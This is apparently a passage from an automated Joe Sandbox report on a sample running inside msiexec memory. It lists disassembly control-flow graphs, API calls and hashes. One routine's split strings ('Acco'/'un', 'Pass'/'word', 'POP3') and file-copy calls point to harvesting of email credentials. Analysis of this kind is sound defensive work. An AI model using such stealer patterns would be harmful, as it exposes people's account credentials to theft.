                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen$File$CopyCreateDelete
                                                                                • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                • API String ID: 3296212668-3023110444
                                                                                • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction ID: bb154ebab9fd3509ca7d6c8768fb5a4e1c7ee8e18dfe9491d0793aa4897ce8e6
                                                                                • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                • Instruction Fuzzy Hash: 4B61E471D40218ABEF15BBE4C980BEEB7BAAF05304F404456D508B7290EF745A47CF56

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 134 2a819b2-2a81a37 call 2a8c030 call 2a82c40 * 2 call 2a844b0 143 2a81a3d-2a81a3f 134->143 144 2a81c50-2a81c54 134->144 145 2a81a6b-2a81a6e 143->145 146 2a81a41-2a81a61 call 2a844b0 143->146 145->144 147 2a81a74-2a81a7f call 2a844b0 145->147 146->143 152 2a81a63-2a81a65 146->152 153 2a81acc-2a81add call 2a844b0 147->153 154 2a81a81 147->154 152->144 152->145 161 2a81adf-2a81aed call 2a844b0 call 2a82c40 153->161 162 2a81af2-2a81b4e call 2a82c40 call 2a844b0 call 2a82db0 call 2a844b0 153->162 155 2a81a87-2a81a90 154->155 157 2a81aca 155->157 158 2a81a92-2a81ac8 call 2a844b0 155->158 157->153 158->155 158->157 172 2a81c4d 161->172 177 2a81b50 162->177 178 2a81b76-2a81bb2 call 2a82c40 * 3 162->178 172->144 180 2a81b53-2a81b71 call 2a84550 call 2a844b0 177->180 191 2a81bd4-2a81bdc 178->191 192 2a81bb4-2a81bb6 178->192 189 2a81b73 180->189 189->178 194 2a81bde 191->194 195 2a81c30-2a81c48 call 2a844b0 call 2a82db0 191->195 193 2a81bb9-2a81bd2 192->193 193->191 193->193 197 2a81be0-2a81c2b call 2a844b0 194->197 195->172 202 2a81c2d 197->202 202->195
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _strlen
                                                                                • String ID: %m$~$Gon~$~F@7$~dra
                                                                                • API String ID: 4218353326-230879103
                                                                                • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction ID: 6dbd25ba2b179fd67a0dbe5b24c3f4246a746ff5e7bce72361bd4fd0f3923303
                                                                                • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                • Instruction Fuzzy Hash: AD71E4B1D002695BDF11BBB49D84BEE7BFDAB09304F144096DA48E7241EE749786CFA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 203 2a87cc2-2a87cd6 204 2a87cd8-2a87cdd 203->204 205 2a87d44-2a87d4c 203->205 204->205 206 2a87cdf-2a87ce4 204->206 207 2a87d4e-2a87d51 205->207 208 2a87d93-2a87dab call 2a87e35 205->208 206->205 209 2a87ce6-2a87ce9 206->209 207->208 211 2a87d53-2a87d90 call 2a8571e * 4 207->211 217 2a87dae-2a87db5 208->217 209->205 212 2a87ceb-2a87cf3 209->212 211->208 215 2a87d0d-2a87d15 212->215 216 2a87cf5-2a87cf8 212->216 222 2a87d2f-2a87d43 call 2a8571e * 2 215->222 223 2a87d17-2a87d1a 215->223 216->215 219 2a87cfa-2a87d0c call 2a8571e call 2a890ba 216->219 220 2a87dd4-2a87dd8 217->220 221 2a87db7-2a87dbb 217->221 219->215 231 2a87dda-2a87ddf 220->231 232 2a87df0-2a87dfc 220->232 227 2a87dbd-2a87dc0 221->227 228 2a87dd1 221->228 222->205 223->222 229 2a87d1c-2a87d2e call 2a8571e call 2a891b8 223->229 227->228 238 2a87dc2-2a87dd0 call 2a8571e * 2 227->238 228->220 229->222 233 2a87ded 231->233 234 2a87de1-2a87de4 231->234 232->217 236 2a87dfe-2a87e0b call 2a8571e 232->236 233->232 234->233 241 2a87de6-2a87dec call 2a8571e 234->241 238->228 241->233
                                                                                APIs
                                                                                • ___free_lconv_mon.LIBCMT ref: 02A87D06
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A890D7
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A890E9
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A890FB
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A8910D
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A8911F
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A89131
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A89143
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A89155
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A89167
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A89179
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A8918B
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A8919D
                                                                                  • Part of subcall function 02A890BA: _free.LIBCMT ref: 02A891AF
                                                                                • _free.LIBCMT ref: 02A87CFB
                                                                                  • Part of subcall function 02A8571E: HeapFree.KERNEL32(00000000,00000000,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?), ref: 02A85734
                                                                                  • Part of subcall function 02A8571E: GetLastError.KERNEL32(?,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?,?), ref: 02A85746
                                                                                • _free.LIBCMT ref: 02A87D1D
                                                                                • _free.LIBCMT ref: 02A87D32
                                                                                • _free.LIBCMT ref: 02A87D3D
                                                                                • _free.LIBCMT ref: 02A87D5F
                                                                                • _free.LIBCMT ref: 02A87D72
                                                                                • _free.LIBCMT ref: 02A87D80
                                                                                • _free.LIBCMT ref: 02A87D8B
                                                                                • _free.LIBCMT ref: 02A87DC3
                                                                                • _free.LIBCMT ref: 02A87DCA
                                                                                • _free.LIBCMT ref: 02A87DE7
                                                                                • _free.LIBCMT ref: 02A87DFF
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                • String ID:
                                                                                • API String ID: 161543041-0
                                                                                • Opcode ID: ee1ce20a4ce1d3fbe75ba6b64d5b2789ead9f93ea1f0f03a0b29bb05a8bde78d
                                                                                • Instruction ID: f684db4368975e50a5ad652d52a4eab4071e6f5f02611eb9a85d6985ab945d56
                                                                                • Opcode Fuzzy Hash: ee1ce20a4ce1d3fbe75ba6b64d5b2789ead9f93ea1f0f03a0b29bb05a8bde78d
                                                                                • Instruction Fuzzy Hash: 24311E35944305DFDB31BB39DE84B66B7EAAF00314F65885AE899D7191EF35A8808F10

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 260 2a859d6-2a859e7 261 2a859e9-2a859f2 call 2a8571e 260->261 262 2a859f3-2a85a7e call 2a8571e * 9 call 2a8589c call 2a858ec 260->262 261->262
                                                                                APIs
                                                                                • _free.LIBCMT ref: 02A859EA
                                                                                  • Part of subcall function 02A8571E: HeapFree.KERNEL32(00000000,00000000,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?), ref: 02A85734
                                                                                  • Part of subcall function 02A8571E: GetLastError.KERNEL32(?,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?,?), ref: 02A85746
                                                                                • _free.LIBCMT ref: 02A859F6
                                                                                • _free.LIBCMT ref: 02A85A01
                                                                                • _free.LIBCMT ref: 02A85A0C
                                                                                • _free.LIBCMT ref: 02A85A17
                                                                                • _free.LIBCMT ref: 02A85A22
                                                                                • _free.LIBCMT ref: 02A85A2D
                                                                                • _free.LIBCMT ref: 02A85A38
                                                                                • _free.LIBCMT ref: 02A85A43
                                                                                • _free.LIBCMT ref: 02A85A51
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 9457e8a29d3ef9a8ea09478edda1f5213875c05037e6bcb6d7b1b7db29f78b77
                                                                                • Instruction ID: f21515a5d404cb497e895b322e48e2a8d3dac60067115119b0cdb2276cc72671
                                                                                • Opcode Fuzzy Hash: 9457e8a29d3ef9a8ea09478edda1f5213875c05037e6bcb6d7b1b7db29f78b77
                                                                                • Instruction Fuzzy Hash: E911777A990148EFCB21FF54CA41DDD3F66EF04350B968596FD488B125EE31DA509F80

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D1B
                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 02A81D37
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D4B
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D58
                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D72
                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D7D
                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 02A81D8A
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                • String ID:
                                                                                • API String ID: 1454806937-0
                                                                                • Opcode ID: a44d8fb498fe74413e28e4518acb6b8f3e4663a0a243b80fd09993388f08ab12
                                                                                • Instruction ID: e4098e9b9e3f85634c80d89fe5650f41cd69db3a04462b798c0af6e51d7e62c6
                                                                                • Opcode Fuzzy Hash: a44d8fb498fe74413e28e4518acb6b8f3e4663a0a243b80fd09993388f08ab12
                                                                                • Instruction Fuzzy Hash: 3421EBB1D8161CAFEB11ABB49CCCFEA76BCEB08354F000965F516D2180EA74DE468A70

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 304 2a89492-2a894ef GetConsoleCP 305 2a89632-2a89644 call 2a82ada 304->305 306 2a894f5-2a89511 304->306 308 2a8952c-2a8953d call 2a87c19 306->308 309 2a89513-2a8952a 306->309 316 2a8953f-2a89542 308->316 317 2a89563-2a89565 308->317 311 2a89566-2a89575 call 2a879e6 309->311 311->305 320 2a8957b-2a8959b WideCharToMultiByte 311->320 318 2a89548-2a8955a call 2a879e6 316->318 319 2a89609-2a89628 316->319 317->311 318->305 326 2a89560-2a89561 318->326 319->305 320->305 322 2a895a1-2a895b7 WriteFile 320->322 324 2a895b9-2a895ca 322->324 325 2a8962a-2a89630 GetLastError 322->325 324->305 327 2a895cc-2a895d0 324->327 325->305 326->320 328 2a895fe-2a89601 327->328 329 2a895d2-2a895f0 WriteFile 327->329 328->306 330 2a89607 328->330 329->325 331 2a895f2-2a895f6 329->331 330->305 331->305 332 2a895f8-2a895fb 331->332 332->328
                                                                                APIs
                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,02A89C07,?,00000000,?,00000000,00000000), ref: 02A894D4
                                                                                • __fassign.LIBCMT ref: 02A8954F
                                                                                • __fassign.LIBCMT ref: 02A8956A
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 02A89590
                                                                                • WriteFile.KERNEL32(?,?,00000000,02A89C07,00000000,?,?,?,?,?,?,?,?,?,02A89C07,?), ref: 02A895AF
                                                                                • WriteFile.KERNEL32(?,?,00000001,02A89C07,00000000,?,?,?,?,?,?,?,?,?,02A89C07,?), ref: 02A895E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                • String ID:
                                                                                • API String ID: 1324828854-0
                                                                                • Opcode ID: 6c71b792b494d4f005bc50b6ed7fd2f158c912ceda924fbafe5500496c0b681a
                                                                                • Instruction ID: 348df0328123e2bc90162f128a9f1691365938d43ba1bd079b4ffeb5750c9ca9
                                                                                • Opcode Fuzzy Hash: 6c71b792b494d4f005bc50b6ed7fd2f158c912ceda924fbafe5500496c0b681a
                                                                                • Instruction Fuzzy Hash: 4951B171D4024AAFDB10DFA8D895AEEBBF8EF09310F14456AE552E7381DB30D951CB60

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 333 2a83370-2a833b5 call 2a83330 call 2a837a7 338 2a83416-2a83419 333->338 339 2a833b7-2a833c9 333->339 340 2a83439-2a83442 338->340 341 2a8341b-2a83428 call 2a83790 338->341 339->340 342 2a833cb 339->342 345 2a8342d-2a83436 call 2a83330 341->345 344 2a833d0-2a833e7 342->344 346 2a833e9-2a833f7 call 2a83740 344->346 347 2a833fd 344->347 345->340 355 2a833f9 346->355 356 2a8340d-2a83414 346->356 348 2a83400-2a83405 347->348 348->344 351 2a83407-2a83409 348->351 351->340 354 2a8340b 351->354 354->345 357 2a833fb 355->357 358 2a83443-2a8344c 355->358 356->345 357->348 359 2a8344e-2a83455 358->359 360 2a83486-2a83496 call 2a83774 358->360 359->360 362 2a83457-2a83466 call 2a8bbe0 359->362 366 2a83498-2a834a7 call 2a83790 360->366 367 2a834aa-2a834c6 call 2a83330 call 2a83758 360->367 368 2a83468-2a83480 362->368 369 2a83483 362->369 366->367 368->369 369->360
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 02A8339B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 02A833A3
                                                                                • _ValidateLocalCookies.LIBCMT ref: 02A83431
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02A8345C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 02A834B1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 1170836740-1018135373
                                                                                • Opcode ID: 36f28b991fed7bcb8029c9652e70918ea06f5f459d0e230a1cf8f5fb3fb97e25
                                                                                • Instruction ID: a2b8d6807a86251d101f2b056b62f44ac17fc333f10fcda05a951b1306972d0f
                                                                                • Opcode Fuzzy Hash: 36f28b991fed7bcb8029c9652e70918ea06f5f459d0e230a1cf8f5fb3fb97e25
                                                                                • Instruction Fuzzy Hash: DB41D034E00208ABCF11FF68C884A9EBBB6BF45B28F1481D5E9159B291DF75DA15CF90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 02A89221: _free.LIBCMT ref: 02A8924A
                                                                                • _free.LIBCMT ref: 02A892AB
                                                                                  • Part of subcall function 02A8571E: HeapFree.KERNEL32(00000000,00000000,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?), ref: 02A85734
                                                                                  • Part of subcall function 02A8571E: GetLastError.KERNEL32(?,?,02A8924F,?,00000000,?,00000000,?,02A89276,?,00000007,?,?,02A87E5A,?,?), ref: 02A85746
                                                                                • _free.LIBCMT ref: 02A892B6
                                                                                • _free.LIBCMT ref: 02A892C1
                                                                                • _free.LIBCMT ref: 02A89315
                                                                                • _free.LIBCMT ref: 02A89320
                                                                                • _free.LIBCMT ref: 02A8932B
                                                                                • _free.LIBCMT ref: 02A89336
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                • String ID:
                                                                                • API String ID: 776569668-0
                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction ID: 9e340590c332b55893a18bf1ab320b0d109f174a4f81fce290dc0927d08aac26
                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                • Instruction Fuzzy Hash: A5110D71AC0B08EAD630FBF0DE45FDBFB9E9F04700F804C25EA9966252EE65A5044A52

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 415 2a88821-2a8883a 416 2a8883c-2a8884c call 2a89341 415->416 417 2a88850-2a88855 415->417 416->417 427 2a8884e 416->427 418 2a88862-2a88886 MultiByteToWideChar 417->418 419 2a88857-2a8885f 417->419 421 2a88a19-2a88a2c call 2a82ada 418->421 422 2a8888c-2a88898 418->422 419->418 424 2a8889a-2a888ab 422->424 425 2a888ec 422->425 428 2a888ca-2a888db call 2a856d0 424->428 429 2a888ad-2a888bc call 2a8bf20 424->429 431 2a888ee-2a888f0 425->431 427->417 434 2a88a0e 428->434 443 2a888e1 428->443 429->434 442 2a888c2-2a888c8 429->442 431->434 435 2a888f6-2a88909 MultiByteToWideChar 431->435 437 2a88a10-2a88a17 call 2a88801 434->437 435->434 436 2a8890f-2a8892a call 2a85f19 435->436 436->434 447 2a88930-2a88937 436->447 437->421 446 2a888e7-2a888ea 442->446 443->446 446->431 448 2a88939-2a8893e 447->448 449 2a88971-2a8897d 447->449 448->437 450 2a88944-2a88946 448->450 451 2a889c9 449->451 452 2a8897f-2a88990 449->452 450->434 453 2a8894c-2a88966 call 2a85f19 450->453 454 2a889cb-2a889cd 451->454 455 2a889ab-2a889bc call 2a856d0 452->455 456 2a88992-2a889a1 call 2a8bf20 452->456 453->437 468 2a8896c 453->468 459 2a889cf-2a889e8 call 2a85f19 454->459 460 2a88a07-2a88a0d call 2a88801 454->460 455->460 467 2a889be 455->467 456->460 471 2a889a3-2a889a9 456->471 459->460 473 2a889ea-2a889f1 459->473 460->434 472 2a889c4-2a889c7 467->472 468->434 471->472 472->454 474 2a88a2d-2a88a33 473->474 475 2a889f3-2a889f4 473->475 476 2a889f5-2a88a05 WideCharToMultiByte 474->476 475->476 476->460 477 2a88a35-2a88a3c call 2a88801 476->477 477->437
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,02A86FFD,00000000,?,?,?,02A88A72,?,?,00000100), ref: 02A8887B
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,02A88A72,?,?,00000100,5EFC4D8B,?,?), ref: 02A88901
                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02A889FB
                                                                                • __freea.LIBCMT ref: 02A88A08
                                                                                  • Part of subcall function 02A856D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02A85702
                                                                                • __freea.LIBCMT ref: 02A88A11
                                                                                • __freea.LIBCMT ref: 02A88A36
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1414292761-0
                                                                                • Opcode ID: a95fe4d6a47951bc56348d6a6bb0bd8ea1a7bea183efe52f188c236790878994
                                                                                • Instruction ID: e9ae76b64e16706f3e21b9b7eb3de33ea85d8010d53bc5992f3d271375c16fe0
                                                                                • Opcode Fuzzy Hash: a95fe4d6a47951bc56348d6a6bb0bd8ea1a7bea183efe52f188c236790878994
                                                                                • Instruction Fuzzy Hash: D651E772A1021AAFDB25AF64CC84EBB77AAEF40754F564629FC05D7180EF39DC50CA50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _strlen.LIBCMT ref: 02A81607
                                                                                • _strcat.LIBCMT ref: 02A8161D
                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,02A8190E,?,?,00000000,?,00000000), ref: 02A81643
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,02A8190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02A8165A
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,02A8190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 02A81661
                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,02A8190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 02A81686
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                • String ID:
                                                                                • API String ID: 1922816806-0
                                                                                • Opcode ID: 417770a181d26253fc791b8070390a614d80bff27d8cfb6e4d69a84cd3476252
                                                                                • Instruction ID: f97069a942050aab0077192bc033f9e6d0c1745a582b9e450dba6b88cf866304
                                                                                • Opcode Fuzzy Hash: 417770a181d26253fc791b8070390a614d80bff27d8cfb6e4d69a84cd3476252
                                                                                • Instruction Fuzzy Hash: 1521DD76D40204BBD704FB64DD80EFE77B9EF48710F24441AE509AB181EF34A9428B65

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 02A81038
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02A8104B
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 02A81061
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 02A81075
                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 02A81090
                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 02A810B8
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                • String ID:
                                                                                • API String ID: 3594823470-0
                                                                                • Opcode ID: 902fc3a523d987f4df79e7f99124fbd746324d85df6e2d1e7403e6e5fd03fc8a
                                                                                • Instruction ID: b3314a0c3a4bfb6aea67d7cf675a16e1294673fa0f6b5646aa95fc5e33665b60
                                                                                • Opcode Fuzzy Hash: 902fc3a523d987f4df79e7f99124fbd746324d85df6e2d1e7403e6e5fd03fc8a
                                                                                • Instruction Fuzzy Hash: FB217F7690031C9BCF20BB64ED88EEB3779EF44314F104696E85AA71A1DF309A96CF40

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 2a83856-2a8385d 523 2a8385f-2a83861 522->523 524 2a83862-2a8387d GetLastError call 2a83b67 522->524 527 2a8387f-2a83881 524->527 528 2a83896-2a83898 524->528 529 2a838dc-2a838e7 SetLastError 527->529 530 2a83883-2a83894 call 2a83ba2 527->530 528->529 530->528 533 2a8389a-2a838aa call 2a855eb 530->533 536 2a838ac-2a838bc call 2a83ba2 533->536 537 2a838be-2a838ce call 2a83ba2 533->537 536->537 542 2a838d0-2a838d2 536->542 543 2a838d4-2a838db call 2a847f0 537->543 542->543 543->529
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,02A83518,02A823F1,02A81F17), ref: 02A83864
                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02A83872
                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02A8388B
                                                                                • SetLastError.KERNEL32(00000000,?,02A83518,02A823F1,02A81F17), ref: 02A838DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.3430417330.0000000002A81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A80000, based on PE: true
                                                                                • Associated: 00000007.00000002.3430398320.0000000002A80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000007.00000002.3430417330.0000000002A96000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_2a80000_msiexec.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                • String ID:
                                                                                • API String ID: 3852720340-0
                                                                                • Opcode ID: 1d170550fc865f0d9ead991ff354686fe9e4bb68577e3b3eac66e02f239ba5e4
                                                                                • Instruction ID: 44fb14a90ac00adc41965952e37273308080f6089f8cfb19cec9078973d08ceb
                                                                                • Opcode Fuzzy Hash: 1d170550fc865f0d9ead991ff354686fe9e4bb68577e3b3eac66e02f239ba5e4
                                                                                • Instruction Fuzzy Hash: DD01A772E89B115EEF1437BB7CC8E562BB5DF45F75B2042B9E510950D0EF1288229744
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,02A86C6C), ref: 02A85AFA
                                                                                • _free.LIBCMT ref: 02A85B2D
